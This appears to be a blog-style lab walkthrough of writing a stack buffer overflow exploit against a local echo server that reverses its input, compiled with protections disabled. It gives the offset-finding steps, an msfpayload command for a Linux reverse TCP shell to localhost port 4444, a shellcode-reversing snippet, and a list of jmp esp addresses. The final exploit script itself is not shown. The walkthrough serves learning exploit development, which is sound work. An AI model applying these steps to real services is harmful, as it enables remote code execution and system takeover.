Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.
Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.
I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.
gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb
Run the vuln-server :
./vuln-server 5700
Open another terminal to run the client :
nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
Enter something on the client, for example :
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh
You will find out that the message you entered is echo back in reverse order.
The server side will display :
127.0.0.1:41959 hello world
Now, write a python script to send 500 bytes of data to the echo server.
Run it and you will find out that the EIP register is overwritten by A's.
Go to create a 500 unique characters to overwrite the EIP.
./pattern_create.rb 500
Copy the result to the captioned python script and replace the junk with the pattern.
Run the python the modified python script again and you will find out that the EIP is overwritten with
0x416c3341
.Reverse the address and find the offset with the following command :
./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339
So, the offset is 339.
Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.
msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper
However, we need to reverse the shellcode with the following python script.
shellcode = "blah blah ...."
shellcode = shellcode[::-1]
shellcode.encode("hex")
print shellcode
Then, add back the "\x" to the shellcode on every two characters.
Okay, it is high time to find the return address.
msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp
<----- selected this oneI select the last one as the return address.
As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :
Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.
Therefore, never run any program with root.
That's all! See you.